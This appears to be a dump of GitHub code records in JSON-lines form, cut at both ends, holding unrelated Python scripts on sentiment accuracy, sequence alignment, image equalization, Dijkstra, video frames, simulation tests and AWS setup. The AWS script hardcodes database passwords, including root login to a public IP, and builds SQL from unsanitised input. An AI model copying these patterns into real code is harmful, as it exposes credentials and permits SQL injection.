shape as `embedding_2` input\n twt = pad_sequences(twt, maxlen=21, dtype='int32', value=0)\n sentiment = model.predict(twt,batch_size=1)[0]\n if(np.argmax(sentiment) == 0):\n output = \"negative\"\n elif (np.argmax(sentiment) == 1):\n output = \"positive\"\n if(output == entry[1]):\n if(entry[2] == \"cebuano\"):\n ceb_correct += 1\n else:\n eng_correct += 1\n else:\n miss += 1\n\n #print accuracy of cebuano,english guess\n print(\"cebuano accuracy: \", ceb_correct/countCebuano)\n print(\"english accuracy: \", eng_correct/countEnglish)\n\n #print the number of correct guess\n print(\"cebuano \", countCebuano, \" correct cebuano guess \", ceb_correct)\n print(\"english \", countEnglish, \" correct english guess \", eng_correct)\n\n#get the pos,neg,ney accuracy\ndef getPosNegNeuAccuracy():\n #get how many pos,neg,and neutral in the dataset\n list_data = data.values.tolist()\n #Count the data by label\n countPositives = sum(p[1] ==\"positive\" for p in list_data)\n countNegatives = sum(p[1] ==\"negative\" for p in list_data)\n countNeutral = sum(p[1] ==\"neutral\" for p in list_data)\n\n pos_correct = 0\n neg_correct = 0\n neu_correct = 0\n miss = 0\n for entry in list_data:\n #vectorizing the tweet by the pre-fitted tokenizer instance\n twt = tokenizer.texts_to_sequences(entry[0])\n #padding the tweet to have exactly the same shape as `embedding_2` input\n twt = pad_sequences(twt, maxlen=21, dtype='int32', value=0)\n sentiment = model.predict(twt,batch_size=1)[0]\n if(np.argmax(sentiment) == 0):\n output = \"negative\"\n elif (np.argmax(sentiment) == 1):\n output = \"positive\"\n if(output == entry[1]):\n if(entry[1] == \"positive\"):\n pos_correct += 1\n elif(entry[1] == \"negative\"):\n neg_correct += 1\n else:\n neu_correct += 1\n else:\n miss += 1\n\n #print accuracy of pos,neg,neu guess\n print(\"positive accuracy: \", pos_correct/countPositives)\n print(\"negative accuracy: \", neg_correct/countNegatives)\n print(\"neutral accuracy: \", neu_correct/countNeutral)\n\n #print the number of correct guess\n print(\"positive \", countPositives, \" correct pos guess \", pos_correct)\n print(\"negative \", countNegatives, \" correct neg guess \", neg_correct)\n print(\"neutral \", countNeutral, \" correct neu guess \", neu_correct)\n\ngetAccuracy()\ngetLanguageAccuracy()\ngetPosNegNeuAccuracy()","repo_name":"namocbryan11/Capstone-Project","sub_path":"Backend/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71325639827","text":"#! /usr/bin/env python\n\nimport sys\nimport optparse\nimport Bio\nfrom Bio import AlignIO\n\nparser = optparse.OptionParser()\n\nparser.add_option('-f', '--fasta_file', action=\"store\", dest=\"fastaIn\", type=\"string\")\n\n(options, args) = parser.parse_args()\nnamefile = options.fastaIn\nfp = open(namefile)\n\nalign = AlignIO.read(namefile, \"fasta\")\noutal = align[:,0:0]\n\nfor i in range(0, len(align[0])):\n if \"N\" not in align[:, i]:\n outal=outal+align[:, i:i+1]\n\nfor record in outal:\n print(\">\"+record.id)\n print(record.seq)\n\n\n\n\n","repo_name":"benoitnabholz/popgen_python","sub_path":"cleanAlignment.py","file_name":"cleanAlignment.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44302097991","text":"from turtle import Turtle\nSTARTING_POSITION = (0, -280)\nMOVE_DISTANCE = 10\nFINISH_LINE = 280\nALIGNMENT = \"center\"\nFONT = (\"Courier\", 24, \"normal\")\n\nclass Player(Turtle):\n def __init__(self):\n super().__init__()\n self.shape(\"turtle\")\n self.color(\"black\")\n self.penup()\n self.setheading(90)\n self.goto(STARTING_POSITION)\n\n def up(self):\n y_coordinate = self.ycor() + MOVE_DISTANCE\n self.goto(self.xcor(), y_coordinate)\n\n def down(self):\n y_coordinate = self.ycor() - MOVE_DISTANCE\n self.goto(self.xcor() , y_coordinate)\n\n def go_right(self):\n x_coordinate = self.xcor() + MOVE_DISTANCE\n self.goto(x_coordinate, self.ycor())\n\n def go_left(self):\n x_coordinate = self.xcor() - MOVE_DISTANCE\n self.goto(x_coordinate, self.ycor())\n\n def game_over(self):\n self.goto(0, 0)\n self.color(\"red\")\n self.write(\"GAME OVER\", align=ALIGNMENT, font=FONT)\n","repo_name":"abrahamanderson19972020/Turtle-Crossing-Game","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"588745323","text":"import glob \nimport numpy as np\nimport re\nimport preprocessor as p\n#http://www.aaai.org/ocs/index.php/ICWSM/ICWSM11/paper/viewFile/2886/3262\n# for name in glob.glob('tweet_log/*'): # gets the filenames of the data text files\n#\tprint name\n\nfilenames = glob.glob('tweet_log/*')\n\npredata = []\ntextdata = []\ncleaningdata = []\ntestdata = []\nfor ele in filenames:\n\twith open(ele) as reading:\n\t\tfor line in reading:\n\t\t\tarray = line.split(\",\")\n\t\t\tfor word in array:\n\t\t\t\tif word.startswith('\"text\":\"'):\n\t\t\t\t\t#print(word)\n\t\t\t\t\tpredata.append(word)\n\nfor indata in predata:\n\ttextdata.append(indata[8:-1])\n\nfor hellodata in range(0,len(textdata)):\n\t#print(textdata[hellodata])\n\ttempphrase = re.sub(r'[^\\x00-\\x7F]',' ', textdata[hellodata])\n\tnewphrase = re.sub(r'#',' ', tempphrase)\n\tcleaningdata.append(newphrase)\n\np.set_options(p.OPT.URL, p.OPT.EMOJI, p.OPT.MENTION,p.OPT.RESERVED,p.OPT.SMILEY)\nfor pro in range(0,len(cleaningdata)):\n\ttestdata.append(p.clean(cleaningdata[pro]))\n\t\n#for testing in range(0,len(testdata)):\n\t#print testdata[testing]\n\n#testdata is the final output\n","repo_name":"archiekey/AuroraBorealis","sub_path":"preprocesstest.py","file_name":"preprocesstest.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21189322236","text":"\"\"\"Time utilities\"\"\"\nfrom datetime import date, timedelta\nimport math\n\n\ndef quarter_to_daterange(quarter):\n \"\"\"Convert a quarter in arbitrary filename-ready format (e.g. 2015Q1)\n into start and end datetimes\"\"\"\n assert len(quarter) == 6\n year = int(quarter[0:4])\n quarter = quarter[5]\n MONTH_DAY = {\n '1': ((1, 1), (3, 31)),\n '2': ((4, 1), (6, 30)),\n '3': ((7, 1), (9, 30)),\n '4': ((10, 1), (12, 31))\n }\n md = MONTH_DAY[quarter]\n start_md, end_md = md\n return (\n date(year, *start_md),\n date(year, *end_md)\n )\n\n\ndef datetime_to_year_quarter(dt):\n \"\"\"\n Args:\n dt: a datetime\n Returns:\n tuple of the datetime's year and quarter\n \"\"\"\n year = dt.year\n quarter = int(math.ceil(float(dt.month)/3))\n return (year, quarter)\n\n\ndef datetime_to_quarter(dt):\n \"\"\"\n Args:\n dt: a datetime\n Returns:\n the datetime's quarter in string format (2015Q1)\n \"\"\"\n year, quarter = datetime_to_year_quarter(dt)\n return '{}Q{}'.format(year, quarter)\n\n\ndef overlaps(start_one, end_one, start_two, end_two):\n return start_one <= end_two and start_two <= end_one\n\n\ndef dates_in_range(start_date, end_date):\n \"\"\"Returns all dates between two dates.\n\n Inclusive of the start date but not the end date.\n\n Args:\n start_date (datetime.date)\n end_date (datetime.date)\n\n Returns:\n (list) of datetime.date objects\n \"\"\"\n return [\n start_date + timedelta(n)\n for n in range(int((end_date - start_date).days))\n ]\n","repo_name":"workforce-data-initiative/skills-utils","sub_path":"skills_utils/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13771846145","text":"from PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\n\n\n#this function is for histogram equalization\ndef histeq(image_array,image_bins=256):\n\n\n\n image_array2,bins = np.histogram(image_array.flatten(),image_bins)\n #print image_array2,bins\n # Calculate the cumulative histogram function\n cdf = image_array2.cumsum()\n\n # The cumulative function was transformed into the interval [ 0,255 ]\n cdf = (255.0/cdf[-1])*cdf\n\n # Original image matrix using integrated conversion function , interpolation process\n image2_array = np.interp(image_array.flatten(),bins[:-1],cdf)\n\n\n # Returns the image matrix leveled and cumulative function\n return image2_array.reshape(image_array.shape),cdf\n\n\n#open the image and convert it to grayscale\nimage = Image.open(\"image.jpg\").convert(\"L\")\n\n#Object into an image matrix\nimage_array = np.array(image)\n\n#print grayscale image and its histogram\nplt.subplot(2,2,1)\nplt.imshow(image,cmap=cm.gray)\nplt.axis(\"off\")\nplt.subplot(2,2,2)\nplt.hist(image_array.flatten(),256) #flatten:Matrix can be converted into one-dimensional sequence\n\na = histeq(image_array) # histogram equalization\nplt.subplot(2,2,3)\nplt.hist(a[0].flatten(),256)\nplt.subplot(2,2,4)\nplt.imshow(Image.fromarray(a[0]),cmap=cm.gray)\nplt.axis(\"off\")\n\nplt.show()\n","repo_name":"littlewindcc/Image-Processing","sub_path":"histogram equalization/histogram equalization.py","file_name":"histogram equalization.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11714009747","text":"import click\nfrom elements.jsonreader import JsonReader\nfrom elements.freqcounter import FreqCounter\nfrom elements.stopword import StopwordElement\nfrom elements.lowercaser import LowerCaser\nfrom elements.summary import SummaryElement\nfrom elements.porterstemmer import PorterStemmerElement\nimport pickle\nimport sys\n\n@click.command()\n@click.argument('input', type=click.File('r'))\n@click.option('--docspath', type=click.File('wb'),\n default='data/parsed-docs.pkl')\n@click.option('--metapath', type=click.File('wb'),\n default='data/doc-meta.pkl')\ndef cli(input, docspath, metapath):\n \"\"\"Parse documents for word vectors and save.\"\"\"\n doc_itr = JsonReader(input)\n with click.progressbar(doc_itr) as prog_doc_itr:\n freq_itr = FreqCounter(prog_doc_itr, 'text')\n lowr_itr = LowerCaser(freq_itr)\n stop_itr = StopwordElement(lowr_itr, ['a', 'an', 'the'])\n stem_itr = PorterStemmerElement(stop_itr)\n sumr_itr = SummaryElement(stem_itr)\n docs = list(sumr_itr)\n meta = {\n 'docFreq': sumr_itr.DF(),\n 'docCount': sumr_itr.N,\n 'avgLength': sumr_itr.averageLength()\n }\n pickle.dump(docs, docspath)\n pickle.dump(meta, metapath)\n","repo_name":"joshterrell805-historic/CPE466-KDD","sub_path":"lab2/scripts/parse_docs.py","file_name":"parse_docs.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33266327324","text":"\"\"\"\n백준 1753 최단경로\n난이도: 골드5\n유형: 다익스트라\n\"\"\"\nimport heapq\n\n# 다익스트라 알고리즘\ndef dijkstra(start):\n # 그래프의 시작 정점 거리는 0으로 초기화\n distances[start] = 0\n \n # 모든 정점이 저장될 큐 생성\n queue = []\n\n # 그래프의 시작 정점과 거리를 최소힙에 넣음\n heapq.heappush(queue, (0, start))\n\n while queue:\n current_distance, current_node = heapq.heappop(queue)\n\n # 지금까지의 거리가 발견한 거리보다 작은 경우 패스\n if distances[current_node] < current_distance:\n continue\n\n # 인접노드, 가중치\n for adjacent, weight in graph[current_node]:\n distance = current_distance + weight\n\n # 최단거리를 발견했을 경우 업데이트\n if distance < distances[adjacent]:\n distances[adjacent] = distance\n heapq.heappush(queue, (distance, adjacent))\n\n# V: 정점의 개수, E: 간선의 개수\nV, E = map(int, input().split())\n# K: 정점의 시작 번호\nK = int(input())\n\ngraph = [[] for _ in range(V+1)]\ndistances = [float('inf')] * (V+1)\n\nfor _ in range(E):\n # u: 정점, v: 정점, w: 가중치\n u, v, w = map(int, input().split())\n graph[u].append((v, w))\n\ndijkstra(K)\n\nfor i in distances[1:]:\n if i == float('inf'):\n print(\"INF\")\n else:\n print(i)\n","repo_name":"noitrighthere/Python-Algorithm","sub_path":"백준/백준_1753_최단경로.py","file_name":"백준_1753_최단경로.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40299170920","text":"\"\"\"Extracts sequence of still images from input video stream.\"\"\"\n\nimport os\nimport queue\nimport subprocess\nimport threading\nfrom typing import Iterator\n\nimport numpy as np\nimport skvideo.io\nfrom PIL import Image\n\nimport screen\nfrom palette import Palette\nfrom video_mode import VideoMode\n\n\nclass FrameGrabber:\n def __init__(self, mode: VideoMode):\n self.video_mode = mode\n self.input_frame_rate = 30\n\n def frames(self) -> Iterator[screen.MemoryMap]:\n raise NotImplementedError\n\n\nclass FileFrameGrabber(FrameGrabber):\n def __init__(self, filename, mode: VideoMode, palette: Palette):\n super(FileFrameGrabber, self).__init__(mode)\n\n self.filename = filename # type: str\n self.palette = palette # type: Palette\n self._reader = skvideo.io.FFmpegReader(filename)\n\n # Compute frame rate from input video\n # TODO: possible to compute time offset for each frame instead?\n data = skvideo.io.ffprobe(self.filename)['video']\n rate_data = data['@r_frame_rate'].split(\"/\") # e.g. 12000/1001\n self.input_frame_rate = float(\n rate_data[0]) / float(rate_data[1]) # type: float\n\n def _frame_grabber(self) -> Iterator[Image.Image]:\n for frame_array in self._reader.nextFrame():\n yield Image.fromarray(frame_array)\n\n @staticmethod\n def _output_dir(filename, video_mode, palette) -> str:\n return \"%s/%s/%s\" % (\n \".\".join(filename.split(\".\")[:-1]),\n video_mode.name,\n palette.name)\n\n def _palette_arg(self) -> str:\n return \"P%d\" % self.palette.value\n\n def frames(self) -> Iterator[screen.MemoryMap]:\n \"\"\"Encode frame to (D)HGR using bmp2dhr.\n\n We do the encoding in a background thread to parallelize.\n \"\"\"\n\n frame_dir = self._output_dir(\n self.filename, self.video_mode, self.palette)\n os.makedirs(frame_dir, exist_ok=True)\n\n q = queue.Queue(maxsize=10)\n\n def _hgr_decode(_idx, _frame):\n outfile = \"%s/%08dC.BIN\" % (frame_dir, _idx)\n bmpfile = \"%s/%08d.bmp\" % (frame_dir, _idx)\n\n try:\n os.stat(outfile)\n except FileNotFoundError:\n _frame = _frame.resize((280, 192), resample=Image.LANCZOS)\n _frame.save(bmpfile)\n\n subprocess.call([\n \"/usr/local/bin/bmp2dhr\", bmpfile, \"hgr\",\n self._palette_arg(),\n \"D9\" # Buckels dither\n ])\n\n os.remove(bmpfile)\n\n _main = np.fromfile(outfile, dtype=np.uint8)\n\n return _main, None\n\n def _dhgr_decode(_idx, _frame):\n mainfile = \"%s/%08d.BIN\" % (frame_dir, _idx)\n auxfile = \"%s/%08d.AUX\" % (frame_dir, _idx)\n\n bmpfile = \"%s/%08d.bmp\" % (frame_dir, _idx)\n\n try:\n os.stat(mainfile)\n os.stat(auxfile)\n except FileNotFoundError:\n _frame = _frame.resize((280, 192), resample=Image.LANCZOS)\n _frame.save(bmpfile)\n\n subprocess.call([\n \"/usr/local/bin/bmp2dhr\", bmpfile, \"dhgr\", # \"v\",\n self._palette_arg(),\n \"A\", # Output separate .BIN and .AUX files\n \"D9\" # Buckels dither\n ])\n\n os.remove(bmpfile)\n\n _main = np.fromfile(mainfile, dtype=np.uint8)\n _aux = np.fromfile(auxfile, dtype=np.uint8)\n\n return _main, _aux\n\n def worker():\n \"\"\"Invoke bmp2dhr to encode input image frames and push to queue.\"\"\"\n\n decode = (\n _dhgr_decode if self.video_mode == VideoMode.DHGR else\n _hgr_decode\n )\n for _idx, _frame in enumerate(self._frame_grabber()):\n q.put(decode(_idx, _frame))\n\n q.put((None, None))\n\n t = threading.Thread(target=worker, daemon=True)\n t.start()\n\n while True:\n main, aux = q.get()\n if main is None:\n break\n\n main_map = screen.FlatMemoryMap(\n screen_page=1, data=main).to_memory_map()\n if aux is None:\n aux_map = None\n else:\n aux_map = screen.FlatMemoryMap(\n screen_page=1, data=aux).to_memory_map()\n yield (main_map, aux_map)\n q.task_done()\n\n t.join()\n","repo_name":"KrisKennaway/ii-vision","sub_path":"transcoder/frame_grabber.py","file_name":"frame_grabber.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"14642561492","text":"import math\n\nfrom simple_playgrounds.engine import Engine\nfrom simple_playgrounds.playground.layouts import SingleRoom\nfrom simple_playgrounds.element.elements.teleport import InvisibleBeam, VisibleBeamHoming, Portal, PortalColor\nfrom simple_playgrounds.common.position_utils import CoordinateSampler\n\nfrom simple_playgrounds.element.elements.basic import Physical\n\n\ndef test_beam(base_forward_interactive_agent_external):\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n beam = InvisibleBeam(destination=((50, 50), 0))\n\n playground.add_agent(agent, ((100, 100), 0))\n playground.add_element(beam, ((140, 100), 0))\n\n engine = Engine(playground, time_limit=100)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while engine.game_on:\n\n engine.step(actions)\n\n assert agent.position[1] == 50\n\n engine.terminate()\n\n\ndef test_beam_orientation(base_forward_interactive_agent_external):\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n beam = InvisibleBeam(destination=((50, 50), math.pi/2))\n\n playground.add_agent(agent, ((100, 100), 0))\n playground.add_element(beam, ((140, 100), 0))\n\n engine = Engine(playground, time_limit=100)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while engine.game_on:\n engine.step(actions)\n\n assert agent.position[0] == 50\n\n engine.terminate()\n\n\ndef test_beam_area(base_forward_interactive_agent_external):\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n\n area = CoordinateSampler(center=(50, 50), area_shape='rectangle', size=(20, 20))\n\n beam = InvisibleBeam(destination=area)\n\n playground.add_agent(agent, ((100, 100), 0))\n playground.add_element(beam, ((140, 100), 0))\n\n engine = Engine(playground, time_limit=100)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while not agent.teleported_to:\n engine.step(actions)\n\n assert 30 <= agent.position[0] <= 80\n assert 30 <= agent.position[1] <= 80\n\n\ndef test_beam_homing(base_forward_interactive_agent_external):\n\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n\n destination = Physical(config_key='pentagon')\n playground.add_element(destination, ((70, 70), 0))\n\n beam = VisibleBeamHoming(destination=destination, invisible_range=4)\n\n playground.add_agent(agent, ((100, 100), 0))\n playground.add_element(beam, ((140, 100), 0))\n\n engine = Engine(playground, time_limit=100)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while not agent.teleported_to:\n engine.step(actions)\n\n assert agent.position.get_distance(destination.position) < agent.base_platform.radius + destination.radius + 4 + 3\n\n\ndef test_portal(base_forward_interactive_agent_external):\n\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n\n portal_1 = Portal(color=PortalColor.RED)\n portal_2 = Portal(color=PortalColor.BLUE)\n portal_3 = Portal(color=PortalColor.GREEN)\n portal_4 = Portal(color=(50, 50, 50))\n\n playground.add_agent(agent, ((100, 80), 0))\n playground.add_element(portal_1, ((140, 80), math.pi))\n playground.add_element(portal_2, ((50, 50), math.pi/2))\n playground.add_element(portal_3, ((50, 120), -math.pi/2))\n playground.add_element(portal_4, ((150, 160), math.pi))\n\n portal_1.destination = portal_2\n portal_3.destination = portal_4\n\n engine = Engine(playground, time_limit=1000)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while engine.game_on:\n engine.step(actions)\n\n assert agent.position[1] == 160\n assert agent.angle % (2 * math.pi) == math.pi\n","repo_name":"emasquil/simple-playgrounds","sub_path":"tests/test_elements/test_teleport_elements.py","file_name":"test_teleport_elements.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"43528061396","text":"import boto3\nimport time\nimport pymysql.cursors\nimport sys\nfrom pymysql import MySQLError\n\nkey_id = \"\"\naccesskey = \"\"\n\ncommunity_name_full = ' '.join(sys.argv[1:])\ncommunity_name = ''.join(e for e in community_name_full if e.isalnum())\n\n\nelbv2 = boto3.client('elbv2', aws_access_key_id=key_id,\n aws_secret_access_key=accesskey, region_name='us-west-1')\n\n\ntgresponse = elbv2.create_target_group(\n Name=community_name,\n Port=80,\n Protocol='HTTP',\n VpcId='vpc-58eeb33c',\n)\n\ntarget_group_arn = tgresponse['TargetGroups'][0]['TargetGroupArn']\n\nlbresponse = elbv2.create_load_balancer(\n Name=community_name,\n Subnets = ['subnet-a66966fe', 'subnet-f8f9079f'],\n SecurityGroups = ['sg-e22a2784']\n)\nlb_arn = lbresponse['LoadBalancers'][0]['LoadBalancerArn']\nlb_ip = lbresponse['LoadBalancers'][0]['DNSName']\nprint(elbv2.describe_load_balancers(\n LoadBalancerArns=[lb_arn]\n))\n\nlistenerresponse = elbv2.create_listener(\n DefaultActions=[\n {\n 'TargetGroupArn': target_group_arn,\n 'Type': 'forward',\n },\n ],\n Port=80,\n Protocol='HTTP',\n LoadBalancerArn=lb_arn,\n)\n\nauto_scaling = boto3.client('autoscaling', aws_access_key_id=key_id,\n aws_secret_access_key=accesskey, region_name='us-west-1')\nauto_scale_response = auto_scaling.create_auto_scaling_group(\n AutoScalingGroupName=community_name,\n LaunchConfigurationName='Community_Launch',\n MaxSize=5,\n MinSize=2,\n VPCZoneIdentifier='subnet-a66966fe, subnet-f8f9079f',\n TargetGroupARNs=[target_group_arn]\n)\n\nauto_scale_instance = auto_scaling.describe_auto_scaling_groups(\n AutoScalingGroupNames=[community_name]\n)\n\n\nrds = boto3.client('rds', aws_access_key_id=key_id,\n aws_secret_access_key=accesskey, region_name='us-west-1')\n\nrds_response = rds.create_db_instance(\n AllocatedStorage=5,\n DBName=community_name,\n DBInstanceClass='db.t2.micro',\n DBInstanceIdentifier=community_name+\"rdsdb\",\n Engine='MySQL',\n MasterUserPassword='redhat123',\n MasterUsername='admin',\n VpcSecurityGroupIds=['sg-e22a2784'],\n DBSubnetGroupName='community_db'\n )\n\nrds_name = rds_response['DBInstance']['DBName']\nrds_arn = rds_response['DBInstance']['DBInstanceArn']\n\nrds_response = rds.describe_db_instances(\n DBInstanceIdentifier=community_name+'rdsdb',\n)\nwhile rds_response['DBInstances'][0]['DBInstanceStatus'] != 'available':\n time.sleep(60)\n rds_response = rds.describe_db_instances(\n DBInstanceIdentifier=community_name + 'rdsdb',\n )\nrds_ip = rds_response['DBInstances'][0]['Endpoint']['Address']\n\n\n\ntry:\n db = pymysql.connect(\"54.183.103.17\", \"root\", \"redhat\", \"cmpe281\")\nexcept MySQLError as e:\n print(e)\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\nsql = \"insert into community_details values('\"+community_name_full+\"','\"+rds_arn+\"','\"+community_name+\"rdsdb\"+\"','\"+\\\n rds_ip+\"','\"+target_group_arn+\"','\"+lb_arn+\"','\"+lb_ip+\"');\"\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error: unable to insert data\")\ndb.commit()\n\ntry:\n db = pymysql.connect(rds_ip, \"admin\", \"redhat123\")\nexcept:\n print('failed1')\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\nsql = \"create database cmpe281;\"\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error Here1\")\n\ndb.commit()\n\ntry:\n db = pymysql.connect(rds_ip, \"admin\", \"redhat123\", \"cmpe281\")\nexcept:\n print('failed')\ncursor = db.cursor()\nsql = \"create table login(`username` varchar(30), `password` varchar(20), `community_name` varchar(20));\"\nprint(sql)\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error Here2\")\n\nsql = \"create table userdata(`username` varchar(30), `first name` varchar(20), `last name` varchar(20), `email` \" \\\n \"varchar(50), `address` varchar(50), `phone` varchar(20), `community` varchar(40), `picurl` varchar(300));\"\nprint(sql)\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error Here3\")\n\nsql = \"create table groups(`groupname` varchar(30), `grouptype` varchar(5), `community` varchar(40));\"\nprint(sql)\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error Here3\")\ndb.commit()\n\ndb.close()","repo_name":"navoday-91/Social_Community","sub_path":"TestingGround.py","file_name":"TestingGround.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3932557824","text":"#######. This algorithm is to convert the excel files into tiff images and arrays. #######\n#Our dataset were in the form of excel tables, to convert these tables into a tiff image, I created this Convert function.\n#To perform this conversion, we have calculated a displacement step called \"step\", \n#because this table represents a multispectral and thermal georeferential part (you can see the different \n#columns in the data / Excel folder) extracted from ERDAS software, so the step represents its resolution.\n#We can display them all 7 at once, for that we saved them in pictures but each length differently \n#(You can see it in the data / TIFandNPY folder\n \n#Loading packages\nfrom PIL import Image\nimport xlrd\nimport numpy as np\nimport os,sys\nfrom skimage.io import imsave,imread\nimport math\nfrom os.path import join\n#import pathproject as pp #TODO creation of a file containing every paths\n\n\ndef mymkdir(path):\n\tif not os.path.exists(path):\n\t\tos.mkdir(path)\n\ndef Convert(PathImportExcel,PathExportTif, channels=[3,4,5,6,7,8,9], step=12,factor=1000):\n print('The channels used are : ',channels)\n #Initialization of indices of images for each channel \n print(os.listdir(PathImportExcel))\n for element in list(os.listdir(PathImportExcel)):\n if element.find('~$')==-1 and element.find('.D')==-1:\n name=element.replace('.xlsx','')\n print(element)\n file= xlrd.open_workbook(PathImportExcel+element)\n #Initilization of indice of subsets\n for k in file.sheet_names():\n tableau = file.sheet_by_name(str(k))\n # Writting the number of lines of each subset \n print('le nombre de lignes de '+str(k)+' %s ' % tableau.nrows)\n # Writting the number of lines of each subset\n print('le nombre de colonnes '+str(k)+' '+'%s ' % tableau.ncols)\n minX=sys.maxsize\n maxX=-sys.maxsize\n minY=sys.maxsize\n maxY=-sys.maxsize\n for l in range(1,tableau.nrows):\n x=tableau.cell_value(l,1)*factor\n minX=min(minX,x)\n maxX=max(maxX,x)\n y=tableau.cell_value(l,2)*factor\n minY=min(minY,y)\n maxY=max(maxY,y)\n #Determination's resolution\n tab=[]\n for i in range(1,4000):\n tab.append(tableau.cell_value(i,1)*factor)\n table=[]\n for i in tab:\n if not i in table:\n table.append(i)\n step=int(table[2]-table[1])\n xSize=1+(maxX-minX)/step\n ySize=1+(maxY-minY)/step\n size =(round(xSize),round(ySize))\n print('the image\"s size:',size)\n namesubset=name+'_'+str(k)\n image_tif_path = join(PathExportTif,namesubset,'ImageTif')\n image_array_path = join(PathExportTif,namesubset,'ImageArray')\n mask_tif_path = join(PathExportTif,namesubset,'MaskTif')\n mask_array_path = join(PathExportTif,namesubset,'MaskArray')\n mymkdir(join(PathExportTif,namesubset))\n mymkdir(image_tif_path)\n mymkdir(image_array_path)\n mymkdir(mask_tif_path)\n mymkdir(mask_array_path)\n matrix=np.zeros([size[0],size[1],len(channels)], dtype=np.float32)\n for cid, h in enumerate(channels):\n image= np.zeros((size[0],size[1]), dtype=np.float32)\n for l in range(1,tableau.nrows):\n i=math.floor((tableau.cell_value(l,1)*factor-minX+step/2.)/step)\n j=math.floor((tableau.cell_value(l,2)*factor-minY+step/2.)/step)\n image[i,j]=(tableau.cell_value(l,h))\n matrix[i,j,cid]=tableau.cell_value(l,h)\n\n imageint=(255*(image-image.min())/(image.max()-image.min())).astype(np.uint8)\n imsave(join(image_tif_path,name+'_'+str(k)+'_B'+str(cid)+'.tif'),imageint)\n #np.save(join(image_array_path,namesubset,'_image.npy'),matrix)\n np.save(PathExportTif+'/'+namesubset+'/'+'ImageArray'+'/'+namesubset+'_image.npy',matrix)\n\n #SAVE MASK\n image= np.zeros((size[0],size[1],1), dtype=np.uint8) \n for l in range(1,tableau.nrows):\n i=int((tableau.cell_value(l,1)*factor-minX)/step)\n j=int((tableau.cell_value(l,2)*factor-minY)/step)\n v=tableau.cell_value(l,11) \n if v==\"other\":\n image[i,j]=0\n else:\n image[i,j]=255\n\n #else: \n #print('UNNKOWN '+v)\n #quit()\n imsave(PathExportTif+'/'+namesubset+'/'+'MaskTif'+'/'+name+'_'+str(k)+'_mask.tif',image)\n np.save(PathExportTif+'/'+namesubset+'/'+'MaskArray'+'/'+namesubset+'_mask.npy',np.float32(image/255.0))\n print(np.shape(image))\n del image\n\n\n#mainPath=os.getcwd()\n#mainPath = '/content/gdrive/My Drive/U-NET'\n#PathImportExcel=mainPath+'/data/Excel/'\n#mymkdir(mainPath+'/data/TIFandNPY')\n\n#PathExportTif=mainPath+'/data/TIFandNPY/'\n\nPathImportExcel='/content/gdrive/My Drive/U-NET/data/Excel/'\nmymkdir('/content/gdrive/My Drive/U-NET/data/TIFandNPY')\n\nPathExportTif='/content/gdrive/My Drive/U-NET/data/TIFandNPY/'\n#Application of method convert \nConvert(PathImportExcel,PathExportTif)\n","repo_name":"GSacchetti/Segmentation-of-multispectral-and-thermal-images-with-U-NET","sub_path":"Construction_data/excel_to_tif_array.py","file_name":"excel_to_tif_array.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18643341999","text":"from collections import Counter\nimport matplotlib.pyplot as plt\nimport json\n\nwith open('../../../../../../../Volumes/jakesExternalDrive/tweets.txt','r') as f:\n #with open('tweets.txt','r') as f:\n file = f.read()\n file = file.split('\\n\\n')[:-1]\n count = 0\n time_counts = Counter(json.loads(item)['created_at'].split(' ')[3] for item in file)\n\ntimes = sorted(time_counts)\ntime_vals = [time_counts[time] for time in times]\nplt.plot(times, time_vals)\nplt.ylabel('# of tweets')\nplt.title('That\\'s a lot of 